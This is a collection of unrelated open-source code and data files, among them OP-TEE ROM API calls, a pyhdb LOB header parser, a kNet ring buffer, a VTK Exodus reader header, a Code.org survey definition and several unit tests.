    // Pre-resolved value: no deferred work needed.
    public AsyncLazy(TValue value) {
        this.single = Mono.just(value);
        this.value = value;
        this.failed = false;
    }
    private AsyncLazy(Mono<TValue> single) {
        logger.debug("constructor");
        this.single = single
            .doOnSuccess(v -> this.value = v)
            .doOnError(e -> this.failed = true)
            .cache();
    }
    /** Returns the memoized Mono; subscribing triggers evaluation at most once. */
    public Mono<TValue> single() {
        return single;
    }
    /** True once the Mono has completed successfully (with a non-null value). */
    public boolean isSucceeded() {
        return value != null;
    }
    /** Non-blocking peek: the resolved value if available, otherwise empty. */
    public Optional<TValue> tryGet() {
        TValue result = this.value;
        if (result == null) {
            return Optional.empty();
        } else {
            return Optional.of(result);
        }
    }
    /** True if the underlying Mono terminated with an error. */
    public boolean isFaulted() {
        return failed;
    }
}
| 742 |
10,723 | <filename>demo/src/main/java/me/yokeyword/sample/demo_wechat/event/StartBrotherEvent.java<gh_stars>1000+
package me.yokeyword.sample.demo_wechat.event;
import me.yokeyword.fragmentation.SupportFragment;
/**
* Created by YoKeyword on 16/6/30.
*/
/**
 * Event payload asking the receiver to start the given "brother" fragment.
 */
public class StartBrotherEvent {
    // Fragment the receiver should start.
    public SupportFragment targetFragment;
    public StartBrotherEvent(SupportFragment targetFragment) {
        this.targetFragment = targetFragment;
    }
}
| 159 |
1,179 | // SPDX-License-Identifier: BSD-2-Clause
/*
* Copyright (c) 2021, EPAM Systems
*/
#include <assert.h>
#include <kernel/panic.h>
#include <mm/core_memprot.h>
#include <mm/core_mmu.h>
#include "rcar.h"
#include "romapi.h"
/*
 * Selects which column of the per-function ROM API address tables applies to
 * the running SoC, based on the product/cut fields of the PRR register.
 * The result is computed once and cached in non-EL3-cleared (__nex_data)
 * storage.
 */
static int get_api_table_index(void)
{
	/*
	 * Depending on SoC type and version, there are 4 possible addresses
	 * for each ROMAPI function
	 */
	static int index __nex_data = -1;
	if (index != -1)
		return index;
	switch (rcar_prr_value & PRR_PRODUCT_MASK) {
	case PRR_PRODUCT_H3:
		switch (rcar_prr_value & PRR_CUT_MASK) {
		case PRR_CUT_10: /* H3 ES1.0 */
		case PRR_CUT_11: /* H3 ES1.1 */
			index = 0;
			break;
		case PRR_CUT_20: /* H3 ES2.0 */
			index = 1;
			break;
		default: /* Newer H3 versions use unified table */
			index = 3;
			break;
		}
		break;
	case PRR_PRODUCT_M3W:
		switch (rcar_prr_value & PRR_CUT_MASK) {
		case PRR_CUT_10: /* M3 ES1.0 */
			index = 2;
			break;
		default: /* Newer M3 versions use unified table */
			index = 3;
			break;
		}
		break;
	default: /* All other SoCs use unified table */
		index = 3;
		break;
	}
	return index;
}
/* implemented in romapi_call.S */
extern uint32_t __plat_romapi_wrapper(paddr_t func, uint64_t arg1,
uint64_t arg2, uint64_t arg3);
/*
 * Calls a ROM function at its physical address directly. Only valid while
 * the MMU is off (asserted), since 'func' is a physical address.
 */
static uint32_t __plat_romapi_direct(paddr_t func, uint64_t arg1,
				     uint64_t arg2, uint64_t arg3)
{
	uint32_t (*fptr)(uint64_t arg1, uint64_t arg2, uint64_t arg3) = NULL;
	assert(!cpu_mmu_enabled());
	fptr = (typeof(fptr))func;
	return fptr(arg1, arg2, arg3);
}
/*
 * Dispatches a ROM API call, picking the direct call when the MMU is already
 * off, or the assembly trampoline (which disables the MMU and switches to a
 * physical stack) when it is on.
 */
static uint32_t plat_call_romapi(paddr_t func, uint64_t arg1,
				 uint64_t arg2, uint64_t arg3)
{
	uint32_t (*fptr)(paddr_t func, uint64_t arg1, uint64_t arg2,
			 uint64_t arg3) = NULL;
	/*
	 * If MMU is enabled, we need to use trampoline function that will
	 * disable MMU and switch stack pointer to physical address. On other
	 * hand, if MMU is disabled, we can call the ROM function directly.
	 */
	if (cpu_mmu_enabled())
		/*
		 * With ASLR enabled __plat_romapi_wrapper() function will be
		 * mapped at two addresses: at random address (with the rest of
		 * OP-TEE) and at identity address. We need to map it at
		 * identity address and call it at identity address because this
		 * function turns off MMU to perform ROM API call. But
		 * __plat_romapi_wrapper *symbol* will be relocated by ASLR
		 * code. To get identity address of the function we need to use
		 * virt_to_phys().
		 */
		fptr = (void *)virt_to_phys(__plat_romapi_wrapper);
	else
		/*
		 * With MMU disabled we can call ROM code directly.
		 */
		fptr = __plat_romapi_direct;
	return fptr(func, arg1, arg2, arg3);
}
/*
 * Translates a pointer to its physical address: with the MMU on the mapping
 * goes through virt_to_phys(); with the MMU off, addresses are already
 * physical.
 */
static paddr_t va2pa(void *ptr)
{
	return cpu_mmu_enabled() ? virt_to_phys(ptr) : (paddr_t)ptr;
}
static const paddr_t romapi_getrndvector[] = {
0xEB10DFC4, /* H3 1.0/1.1, needs confirmation */
0xEB117134, /* H3 2.0 */
0xEB11055C, /* M3 1.0/1.05, needs confirmation */
0xEB100188, /* H3 3.0, M3 1.1+, M3N, E3, D3, V3M 2.0 */
};
/*
 * Fills 'rndbuff' with PLAT_RND_VECTOR_SZ random bytes using the Boot ROM's
 * RNG service. 'scratch' must be at least 4 KiB; both buffers must be
 * cache-line aligned because the ROM runs with the MMU (and thus caches)
 * disabled. Returns the ROM API status code.
 */
uint32_t plat_rom_getrndvector(uint8_t rndbuff[PLAT_RND_VECTOR_SZ],
			       uint8_t *scratch, uint32_t scratch_sz)
{
	uint32_t ret = -1;
	paddr_t func_addr = romapi_getrndvector[get_api_table_index()];
	paddr_t rndbuff_pa = va2pa(rndbuff);
	paddr_t scratch_pa = va2pa(scratch);
	assert(scratch_sz >= 4096);
	assert(rndbuff_pa % RCAR_CACHE_LINE_SZ == 0);
	assert(scratch_pa % RCAR_CACHE_LINE_SZ == 0);
	ret = plat_call_romapi(func_addr, rndbuff_pa, scratch_pa, scratch_sz);
	/*
	 * ROM code is called with MMU turned off, so any accesses to rndbuff
	 * are not affected by data cache. This can lead to two problems:
	 *
	 * 1. Any prior writes can be cached but may not reach memory. So staled
	 * values can be flushed to memory later and overwrite new data written
	 * by ROM code. This includes stack as well.
	 *
	 * 2. ROM code will write new data to the buffer, but we may see old,
	 * cached values.
	 *
	 * ROM code wrapper will issue dcache_op_all(DCACHE_OP_CLEAN). This will
	 * ensure that all writes reached memory. After the call we need to
	 * invalidate the cache to see new data.
	 *
	 * We are not accessing scratch area, so no need to do cache maintenance
	 * for that buffer.
	 */
	cache_op_inner(DCACHE_AREA_INVALIDATE, rndbuff, PLAT_RND_VECTOR_SZ);
	return ret;
}
| 1,754 |
335 | {
"word": "Unusual",
"definitions": [
"Not habitually or commonly occurring or done.",
"Remarkable or interesting because different from or better than others."
],
"parts-of-speech": "Adjective"
} | 83 |
332 | <filename>pyhdb/protocol/headers.py
# Copyright 2014, 2015 SAP SE.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: //www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import collections
import struct
###
from pyhdb.protocol.constants import type_codes
MessageHeader = collections.namedtuple(
'MessageHeader', 'session_id, packet_count, payload_length, varpartsize, num_segments, packet_options')
RequestSegmentHeader = collections.namedtuple(
'RequestSegmentHeader',
'segment_length, segment_offset, num_parts, segment_number, segment_kind, message_type, commit, command_options')
ReplySegmentHeader = collections.namedtuple(
'ReplySegmentHeader',
'segment_length, segment_offset, num_parts, segment_number, segment_kind, function_code')
PartHeader = collections.namedtuple(
'PartHeader',
'part_kind, part_attributes, argument_count, bigargument_count, payload_size, remaining_buffer_size')
class BaseLobheader(object):
    """Base LobHeader class.

    Holds the LOB type constants shared by read/write headers, the mapping
    from protocol type codes to those constants, and the bit masks for the
    'options' byte (field 2 of the header).
    """
    BLOB_TYPE = 1
    CLOB_TYPE = 2
    NCLOB_TYPE = 3
    # Map wire-protocol type codes to the LOB type constants above.
    LOB_TYPES = {type_codes.BLOB: BLOB_TYPE, type_codes.CLOB: CLOB_TYPE, type_codes.NCLOB: NCLOB_TYPE}
    # Bit masks for LOB options (field 2 in header):
    LOB_OPTION_ISNULL = 0x01
    LOB_OPTION_DATAINCLUDED = 0x02
    LOB_OPTION_LASTDATA = 0x04
    # Human-readable names for the option bits (used by ReadLobHeader.__str__).
    OPTIONS_STR = {
        LOB_OPTION_ISNULL: 'isnull',
        LOB_OPTION_DATAINCLUDED: 'data_included',
        LOB_OPTION_LASTDATA: 'last_data'
    }
class WriteLobHeader(BaseLobheader):
    """Write-LOB header structure used when sending data to Hana.
    Total header size is 10 bytes.
    Note that the lob data does not come immediately after the lob header but AFTER all rowdata headers
    have been written to the part header!!!

    00: TYPECODE: I1
    01: OPTIONS: I1       Options that further refine the descriptor
    02: LENGTH: I4        Length of bytes of data that follows
    06: POSITION: I4      Position P of the lob data in the part (startinb at the beginning of the part)
    ...
    P: LOB data
    """
    # Little-endian: type code (B), options (B), length (I), position (I).
    header_struct = struct.Struct('<BBII')
class ReadLobHeader(BaseLobheader):
    """
    Read-LOB header structure used when receiving data from Hana.
    (incomplete in Command Network Protocol Reference docs):
    Total header size is 32 bytes. The first columns denotes the offset:

    00: TYPE: I1          Type of data
    01: OPTIONS: I1       Options that further refine the descriptor
       -> no further data to be read for LOB if options->is_null is true
    02: RESERVED: I2      (ignore this)
    04: CHARLENGTH: I8    Length of string (for asci and unicode)
    12: BYTELENGTH: I8    Number of bytes of LOB
    20: LOCATORID: B8     8 bytes serving as locator id for LOB
    28: CHUNKLENGTH: I4   Number of bytes of LOB chunk in this result set
    32: LOB data if CHUNKLENGTH > 0
    """
    # Part 1 (2 bytes) is always present; part 2 (30 bytes) only for non-NULL LOBs.
    header_struct_part1 = struct.Struct('<BB')   # read blob type and 'options' field
    header_struct_part2 = struct.Struct('<2sQQ8sI')  # only read if blob is not null (see options field)

    def __init__(self, payload):
        """Parse LOB header from payload.

        :param payload: file-like object positioned at the start of the header;
            consumed by 2 bytes for NULL LOBs, 32 bytes otherwise.
        """
        raw_header_p1 = payload.read(self.header_struct_part1.size)
        self.lob_type, self.options = self.header_struct_part1.unpack(raw_header_p1)
        if not self.isnull():
            raw_header_p2 = payload.read(self.header_struct_part2.size)
            header = self.header_struct_part2.unpack(raw_header_p2)
            (reserved, self.char_length, self.byte_length, self.locator_id, self.chunk_length) = header
            # Set total_lob_length attribute differently for binary and character lobs:
            self.total_lob_length = self.byte_length if self.lob_type == self.BLOB_TYPE else self.char_length

    def isnull(self):
        # True when the ISNULL option bit is set; no further header bytes follow.
        return bool(self.options & self.LOB_OPTION_ISNULL)

    def __str__(self):
        """Return a string of properly formatted header values"""
        O = self.OPTIONS_STR
        options = [O[o] for o in sorted(self.OPTIONS_STR.keys()) if o & self.options]
        options_str = ', '.join(options)
        value = 'type: %d, options %d (%s)' % (self.lob_type, self.options, options_str)
        if not self.isnull():
            value += ', charlength: %d, bytelength: %d, locator_id: %r, chunklength: %d' % \
                (self.char_length, self.byte_length, self.locator_id, self.chunk_length)
        return '<ReadLobHeader %s>' % value
| 1,809 |
3,170 | <reponame>elix22/AtomicGameEngine
/* Copyright The kNet Project.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License. */
#pragma once
/** @file RingBuffer.h
@brief The RingBuffer class stores a fast raw byte buffer queue storage. */
#include <vector>
namespace kNet
{
/// Implements a byte-based ring buffer (of sorts) of raw bytes.
/// Valid data occupies [start, end) inside a fixed backing store; the buffer
/// never wraps, so Compact() is used to reclaim consumed space at the front.
class RingBuffer
{
public:
	explicit RingBuffer(int capacity)
	{
		data.resize(capacity);
		start = 0;
		end = 0;
	}

	/// Returns the total number of bytes that this RingBuffer can contain.
	int Capacity() const { return (int)data.size(); }

	/// Returns the number of bytes filled in the ring buffer.
	int Size() const { return end - start; }

	/// Compacts the ring buffer, i.e. moves all bytes to the beginning of the array.
	void Compact()
	{
		// If already compacted, do nothing.
		if (start == 0)
			return;
		const int numBytes = Size();
		for(int i = 0; i < numBytes; ++i)
			data[i] = data[start+i];
		start = 0;
		end = numBytes;
	}

	/// Enlarges the RingBuffer capacity so that it can fit at least the given number of bytes total.
	/// If the capacity of the RingBuffer was greater than this, does nothing.
	void Resize(int newSize)
	{
		assert(newSize > 0);
		if ((size_t)newSize <= data.size())
			return; // No need to resize.
		Compact();
		data.resize(newSize);
	}

	void Clear()
	{
		start = end = 0;
	}

	/// Returns a pointer to the first byte of actual data.
	/// Computed via data.data() rather than operator[]: when start == end ==
	/// capacity is never reached (Consumed resets to 0), but using a raw
	/// pointer keeps Begin()/End() symmetric and avoids checked-STL asserts.
	char *Begin() { return data.data() + start; }

	/// Returns a pointer to one past the last byte of actual data.
	/// 'end' may legitimately equal data.size() when the buffer is full, and
	/// indexing one-past-the-end with operator[] (&data[end]) is undefined
	/// behaviour, so form the pointer arithmetically instead.
	char *End() { return data.data() + end; }

	int StartIndex() const { return start; }

	/// Call after having inserted the given amount of bytes to the buffer.
	void Inserted(int numBytes)
	{
		end += numBytes;
		assert(end <= (int)data.size());
	}

	/// Call after having processed the given number of bytes from the buffer.
	void Consumed(int numBytes)
	{
		start += numBytes;
		assert(start <= end);
		if (start == end) // Free compact?
			start = end = 0;
	}

	/// Returns the total number of bytes that can be filled in this structure after compacting.
	int TotalFreeBytesLeft() const { return (int)data.size() - Size(); }

	/// Returns the number of bytes that can be added to this structure contiguously, without having to compact.
	int ContiguousFreeBytesLeft() const { return (int)data.size() - end; }

private:
	std::vector<char> data;
	int start; ///< Points to the first used byte.
	int end;   ///< Points to the first unused byte.
};
} // ~kNet
| 1,067 |
772 | {
"published": true,
"title": "Satisfaction Survey for Code.org's CS Fundamentals Intro Professional Development Workshop",
"pages": [
{
"name": "page1",
"elements": [
{
"type": "html",
"name": "intro_text",
"html": "<p><strong>Well done, you've completed the Code.org CS Fundamentals Intro workshop!</strong></p><p>This survey asks questions about your experience today. Your feedback is crucial to ensuring we best serve educators through continual program improvement.</p><p><strong>Privacy and Confidentiality</strong></p><ul><li>Your individual responses here are completely <strong>confidential</strong>.</li><li>Your identity will <strong>never</strong> be revealed publicly or used to tie any responses back to you personally.</li><li>We may share <strong>de-identified</strong>, aggregate data (representing all responses) publicly.</li><li>Your <strong>de-identified</strong> responses will be used by Code.org, our Regional Partners, and our facilitators for program improvement.</li></ul>"
},
{
"type": "radiogroup",
"name": "workshop_type",
"title": "Was your workshop:",
"choices": [
{
"value": "item1",
"text": "in person"
},
{
"value": "item2",
"text": "virtual"
}
]
},
{
"type": "library_item",
"library_name": "surveys/pd/workshop_elements",
"library_version": 0,
"name": "overall_success"
},
{
"type": "library_item",
"library_name": "surveys/pd/workshop_elements",
"library_version": 0,
"name": "what_supported"
},
{
"type": "library_item",
"library_name": "surveys/pd/workshop_elements",
"library_version": 0,
"name": "what_detracted"
},
{
"type": "library_item",
"library_name": "surveys/pd/workshop_elements",
"library_version": 0,
"name": "curriculum_impressions_csf"
},
{
"type": "comment",
"name": "feedback_venue_logistics",
"title": "Do you have feedback about the venue and the way logistics were run for this workshop? Please be specific and provide suggestions for improvement."
},
{
"type": "comment",
"name": "anything_else",
"title": "Is there anything else you’d like to tell us about your experience at this workshop?"
},
{
"type": "library_item",
"library_name": "surveys/pd/facilitator_panel",
"library_version": 0,
"name": "facilitators"
},
{
"type": "html",
"name": "last_text",
"html": "Lastly, we would like to know a little about you, your background, and if we can stay in touch with you."
},
{
"type": "text",
"name": "year_of_birth",
"title": "What is your year of birth?",
"inputType": "number",
"min": "1920",
"max": "2020"
},
{
"type": "library_item",
"library_name": "surveys/pd/demographic_items",
"library_version": 0,
"name": "gender_identity"
},
{
"type": "library_item",
"library_name": "surveys/pd/demographic_items",
"library_version": 0,
"name": "racial_ethnic_identity"
},
{
"type": "library_item",
"library_name": "surveys/pd/workshop_elements",
"library_version": 0,
"name": "permission_to_quote"
},
{
"type": "radiogroup",
"name": "willing_talk",
"title": "Would you be willing to talk to someone at Code.org about your PD experiences? ",
"isRequired": true,
"choices": [
{
"value": "yes",
"text": "Yes"
},
{
"value": "no",
"text": "No"
}
]
}
]
}
]
} | 2,025 |
5,169 | <reponame>Gantios/Specs<filename>Specs/7/8/d/WAMSimpleDataSource/0.1.1/WAMSimpleDataSource.podspec.json<gh_stars>1000+
{
"name": "WAMSimpleDataSource",
"version": "0.1.1",
"summary": "An easier way to create readable static table view data source",
"homepage": "https://github.com/WAMaker/WAMSimpleDataSource",
"authors": {
"WAMaker": "https://github.com/WAMaker"
},
"license": {
"type": "MIT",
"file": "LICENSE"
},
"source": {
"git": "https://github.com/WAMaker/WAMSimpleDataSource.git",
"tag": "0.1.1"
},
"platforms": {
"ios": "8.0"
},
"requires_arc": true,
"source_files": "WAMSimpleDataSource/*.{h,m}"
}
| 282 |
575 | // Copyright 2017 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "chrome/browser/safe_browsing/chrome_cleaner/chrome_cleaner_fetcher_win.h"
#include "base/base_paths.h"
#include "base/bind.h"
#include "base/callback.h"
#include "base/callback_helpers.h"
#include "base/files/file_path.h"
#include "base/files/file_util.h"
#include "base/memory/ptr_util.h"
#include "base/run_loop.h"
#include "base/test/task_environment.h"
#include "chrome/browser/safe_browsing/chrome_cleaner/srt_field_trial_win.h"
#include "content/public/test/browser_task_environment.h"
#include "net/base/net_errors.h"
#include "net/base/network_change_notifier.h"
#include "net/http/http_status_code.h"
#include "services/network/test/test_url_loader_factory.h"
#include "testing/gmock/include/gmock/gmock.h"
#include "testing/gtest/include/gtest/gtest.h"
#include "url/gurl.h"
namespace safe_browsing {
namespace {
// Test fixture for FetchChromeCleaner(): runs the fetch against a
// network::TestURLLoaderFactory on an IO-flavored main thread and records
// the results the fetch callback reports.
class ChromeCleanerFetcherTest : public ::testing::Test {
 public:
  ChromeCleanerFetcherTest()
      : task_environment_(base::test::TaskEnvironment::MainThreadType::IO) {}
  // Deletes the downloaded file and, if that leaves its directory empty,
  // the directory as well.
  void TearDown() override {
    if (!downloaded_path_.empty()) {
      base::DeleteFile(downloaded_path_);
      if (base::IsDirectoryEmpty(downloaded_path_.DirName()))
        base::DeleteFile(downloaded_path_.DirName());
    }
  }
  // Kicks off the fetch; FetchedCallback() quits |run_loop_| when it fires.
  void StartFetch() {
    FetchChromeCleaner(
        base::BindOnce(&ChromeCleanerFetcherTest::FetchedCallback,
                       base::Unretained(this)),
        &test_url_loader_factory_);
  }
  // Captures the fetch result for the TEST_F bodies to inspect.
  void FetchedCallback(base::FilePath downloaded_path,
                       ChromeCleanerFetchStatus fetch_status) {
    callback_called_ = true;
    downloaded_path_ = downloaded_path;
    fetch_status_ = fetch_status;
    run_loop_.Quit();
  }
 protected:
  base::test::TaskEnvironment task_environment_;
  network::TestURLLoaderFactory test_url_loader_factory_;
  base::RunLoop run_loop_;
  // Variables set by FetchedCallback().
  bool callback_called_ = false;
  base::FilePath downloaded_path_;
  ChromeCleanerFetchStatus fetch_status_ =
      ChromeCleanerFetchStatus::kOtherFailure;
};
// A 200 response must report kSuccess and write the payload to a real file.
TEST_F(ChromeCleanerFetcherTest, FetchSuccess) {
  const std::string kFileContents("FileContents");
  test_url_loader_factory_.AddResponse(GetSRTDownloadURL().spec(),
                                       kFileContents);
  StartFetch();
  run_loop_.Run();
  EXPECT_TRUE(callback_called_);
  // Fixed: the original asserted EXPECT_EQ(downloaded_path_, downloaded_path_),
  // a self-comparison that can never fail. Check that a destination path was
  // actually reported instead.
  EXPECT_FALSE(downloaded_path_.empty());
  EXPECT_EQ(fetch_status_, ChromeCleanerFetchStatus::kSuccess);
  std::string file_contents;
  EXPECT_TRUE(ReadFileToString(downloaded_path_, &file_contents));
  EXPECT_EQ(kFileContents, file_contents);
}
// A 404 from the server must be reported as kNotFoundOnServer with no file.
TEST_F(ChromeCleanerFetcherTest, NotFoundOnServer) {
  test_url_loader_factory_.AddResponse(GetSRTDownloadURL().spec(), "",
                                       net::HTTP_NOT_FOUND);
  StartFetch();
  run_loop_.Run();
  EXPECT_TRUE(callback_called_);
  EXPECT_TRUE(downloaded_path_.empty());
  EXPECT_EQ(fetch_status_, ChromeCleanerFetchStatus::kNotFoundOnServer);
}
// A transport-level failure (here net::ERR_ADDRESS_INVALID) must be reported
// as kOtherFailure with no file.
TEST_F(ChromeCleanerFetcherTest, NetworkError) {
  // For this test, just use any http response code other than net::HTTP_OK
  // and net::HTTP_NOT_FOUND.
  test_url_loader_factory_.AddResponse(
      GetSRTDownloadURL(), network::mojom::URLResponseHead::New(), "contents",
      network::URLLoaderCompletionStatus(net::ERR_ADDRESS_INVALID));
  StartFetch();
  run_loop_.Run();
  EXPECT_TRUE(callback_called_);
  EXPECT_TRUE(downloaded_path_.empty());
  EXPECT_EQ(fetch_status_, ChromeCleanerFetchStatus::kOtherFailure);
}
} // namespace
} // namespace safe_browsing
| 1,421 |
778 | <reponame>lkusch/Kratos
import KratosMultiphysics
import KratosMultiphysics.FluidDynamicsApplication as KratosFluid
def Factory(settings, Model):
    """Create an EmbeddedSkinVisualizationProcess from json settings.

    Args:
        settings: KratosMultiphysics.Parameters wrapping the process json,
            with the process options under settings["Parameters"].
        Model: The Kratos model container, passed through to the process.

    Returns:
        A KratosFluid.EmbeddedSkinVisualizationProcess instance.

    Raises:
        Exception: If settings is not a KratosMultiphysics.Parameters object.
    """
    # isinstance() is the idiomatic type check (and also accepts subclasses),
    # unlike the previous exact type(...) comparison.
    if not isinstance(settings, KratosMultiphysics.Parameters):
        raise Exception("expected input shall be a Parameters object, encapsulating a json string")

    # Backwards compatibility helper: drop settings that are no longer used,
    # warning the user so input files can be cleaned up.
    if settings["Parameters"].Has("parallel_type"):
        settings["Parameters"].RemoveValue("parallel_type")
        warn_msg = "\"parallel_type\" is no longer needed. Removing from input settings."
        KratosMultiphysics.Logger.PrintWarning('\n\x1b[1;31mDEPRECATION-WARNING\x1b[0m', warn_msg)

    if settings["Parameters"].Has("output_configuration"):
        settings["Parameters"].RemoveValue("output_configuration")
        warn_msg = "\"output_configuration\" is no longer needed as the visualization mesh is no longer print in the \"ApplyEmbeddedSkinVisualizationProcess\". Removing from input settings.\n"
        warn_msg += "Add your preferred output process in the \"output_process_list\" of the simulation settings (namely ProjectParameters.json)."
        KratosMultiphysics.Logger.PrintWarning('\n\x1b[1;31mDEPRECATION-WARNING\x1b[0m', warn_msg)

    return KratosFluid.EmbeddedSkinVisualizationProcess(Model, settings["Parameters"])
1,755 | <gh_stars>1000+
/*=========================================================================
Program: Visualization Toolkit
Module: vtkPExodusIIReader.h
Copyright (c) <NAME>, <NAME>, <NAME>
All rights reserved.
See Copyright.txt or http://www.kitware.com/Copyright.htm for details.
This software is distributed WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE. See the above copyright notice for more information.
=========================================================================*/
/*----------------------------------------------------------------------------
Copyright (c) Sandia Corporation
See Copyright.txt or http://www.paraview.org/HTML/Copyright.html for details.
----------------------------------------------------------------------------*/
/**
* @class vtkPExodusIIReader
* @brief Read Exodus II files (.exii)
*
 * vtkPExodusIIReader is an unstructured grid source object that reads
* ExodusII files. Most of the meta data associated with the
* file is loaded when UpdateInformation is called. This includes
* information like Title, number of blocks, number and names of
* arrays. This data can be retrieved from methods in this
* reader. Separate arrays that are meant to be a single vector, are
* combined internally for convenience. To be combined, the array
* names have to be identical except for a trailing X,Y and Z (or
* x,y,z). By default all cell and point arrays are loaded. However,
* the user can flag arrays not to load with the methods
* "SetPointDataArrayLoadFlag" and "SetCellDataArrayLoadFlag". The
* reader responds to piece requests by loading only a range of the
* possible blocks. Unused points are filtered out internally.
*/
#ifndef vtkPExodusIIReader_h
#define vtkPExodusIIReader_h
#include "vtkExodusIIReader.h"
#include "vtkIOParallelExodusModule.h" // For export macro
#include <vector> // Required for vector
class vtkTimerLog;
class vtkMultiProcessController;
class VTKIOPARALLELEXODUS_EXPORT vtkPExodusIIReader : public vtkExodusIIReader
{
public:
  static vtkPExodusIIReader* New();
  vtkTypeMacro(vtkPExodusIIReader, vtkExodusIIReader);
  void PrintSelf(ostream& os, vtkIndent indent) override;
  ///@{
  /**
   * Set/get the communication object used to relay a list of files
   * from the rank 0 process to all others. This is the only interprocess
   * communication required by vtkPExodusIIReader.
   */
  void SetController(vtkMultiProcessController* c);
  vtkGetObjectMacro(Controller, vtkMultiProcessController);
  ///@}
  ///@{
  /**
   * These methods tell the reader that the data is distributed across
   * multiple files. This is for distributed execution. In this case,
   * pieces are mapped to files. The pattern should have one %d to
   * format the file number. FileNumberRange is used to generate file
   * numbers. I was thinking of having an arbitrary list of file
   * numbers. This may happen in the future. (That is why there is no
   * GetFileNumberRange method.)
   */
  vtkSetFilePathMacro(FilePattern);
  vtkGetFilePathMacro(FilePattern);
  vtkSetFilePathMacro(FilePrefix);
  vtkGetFilePathMacro(FilePrefix);
  ///@}
  ///@{
  /**
   * Set the range of files that are being loaded. The range for a single
   * file should add to 0.
   */
  void SetFileRange(int, int);
  void SetFileRange(int* r) { this->SetFileRange(r[0], r[1]); }
  vtkGetVector2Macro(FileRange, int);
  ///@}
  /**
   * Provide an arbitrary list of file names instead of a prefix,
   * pattern and range. Overrides any prefix, pattern and range
   * that is specified. vtkPExodusIIReader makes its own copy
   * of your file names.
   */
  void SetFileNames(int nfiles, const char** names);
  void SetFileName(VTK_FILEPATH const char* name) override;
  /**
   * Return pointer to list of file names set in SetFileNames
   */
  char** GetFileNames() { return this->FileNames; }
  /**
   * Return number of file names set in SetFileNames
   */
  int GetNumberOfFileNames() { return this->NumberOfFileNames; }
  ///@{
  /**
   * Return the number of files to be read.
   */
  vtkGetMacro(NumberOfFiles, int);
  ///@}
  vtkIdType GetTotalNumberOfElements() override;
  vtkIdType GetTotalNumberOfNodes() override;
  /**
   * Sends metadata (that read from the input file, not settings modified
   * through this API) from the rank 0 node to all other processes in a job.
   */
  virtual void Broadcast(vtkMultiProcessController* ctrl);
  ///@{
  /**
   * The size of the variable cache in MegaBytes. This represents the maximum
   * size of cache that a single partition reader can have while reading. When
   * a reader is finished its cache size will be set to a fraction of this based
   * on the number of partitions.
   * The Default for this is 100MiB.
   * Note that because each reader still holds
   * a fraction of the cache size after reading the total amount of data cached
   * can be at most twice this size.
   */
  vtkGetMacro(VariableCacheSize, double);
  vtkSetMacro(VariableCacheSize, double);
  ///@}
protected:
  vtkPExodusIIReader();
  ~vtkPExodusIIReader() override;
  ///@{
  /**
   * Try to "guess" the pattern of files.
   */
  int DeterminePattern(const char* file);
  static int DetermineFileId(const char* file);
  ///@}
  // holds the size of the variable cache in GigaBytes
  double VariableCacheSize;
  // **KEN** Previous discussions concluded with std classes in header
  // files is bad. Perhaps we should change ReaderList.
  vtkMultiProcessController* Controller;
  vtkIdType ProcRank;
  vtkIdType ProcSize;
  char* FilePattern;
  char* CurrentFilePattern;
  char* FilePrefix;
  char* CurrentFilePrefix;
  char* MultiFileName;
  int FileRange[2];
  int CurrentFileRange[2];
  int NumberOfFiles;
  char** FileNames;
  int NumberOfFileNames;
  std::vector<vtkExodusIIReader*> ReaderList;
  std::vector<int> NumberOfPointsPerFile;
  std::vector<int> NumberOfCellsPerFile;
  int LastCommonTimeStep;
  int Timing;
  vtkTimerLog* TimerLog;
  int RequestInformation(vtkInformation*, vtkInformationVector**, vtkInformationVector*) override;
  int RequestData(vtkInformation*, vtkInformationVector**, vtkInformationVector*) override;
private:
  vtkPExodusIIReader(const vtkPExodusIIReader&) = delete;
  void operator=(const vtkPExodusIIReader&) = delete;
};
| 1,876 |
776 | """Tests for the violations.Error class."""
import pytest
import collections
import textwrap
from pydocstyle.violations import Error
MockDefinition = collections.namedtuple('MockDefinition', ['source', 'start'])
def test_message_without_context():
    """An error with no context template renders as 'CODE: short message'."""
    err = Error('CODE', 'an error', None)
    assert 'CODE: an error' == err.message
def test_message_with_context():
    """Context parameters are formatted into parentheses after the message."""
    err = Error('CODE', 'an error', 'got {}', 0)
    assert 'CODE: an error (got 0)' == err.message
def test_message_with_insufficient_parameters():
    """A context template with missing arguments raises IndexError on use."""
    err = Error('CODE', 'an error', 'got {}')
    with pytest.raises(IndexError):
        assert err.message
def test_lines():
    """Test proper printing of source lines, including blank line trimming.

    The definition's source starts at line 424; trailing blank lines must be
    dropped from the rendered snippet while interior blanks are kept.
    """
    error = Error('CODE', 'an error', None)
    definition = MockDefinition(source=['def foo():\n',
                                        '    """A docstring."""\n',
                                        '\n',
                                        '    pass\n',
                                        '\n',
                                        '\n'],
                                start=424)
    error.set_context(definition, None)
    # Removed the stray debug print(error.lines) that used to be here:
    # tests should not write to stdout on success.
    assert error.lines == textwrap.dedent('''\
        424: def foo():
        425:     """A docstring."""
        426:
        427:     pass
    ''')
| 693 |
1,763 | <gh_stars>1000+
/* *****************************************************************************
*
*
*
* This program and the accompanying materials are made available under the
* terms of the Apache License, Version 2.0 which is available at
* https://www.apache.org/licenses/LICENSE-2.0.
* See the NOTICE file distributed with this work for additional
* information regarding copyright ownership.
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*
* SPDX-License-Identifier: Apache-2.0
******************************************************************************/
package org.deeplearning4j.datapipelineexamples.formats.svmlight;
import org.datavec.api.conf.Configuration;
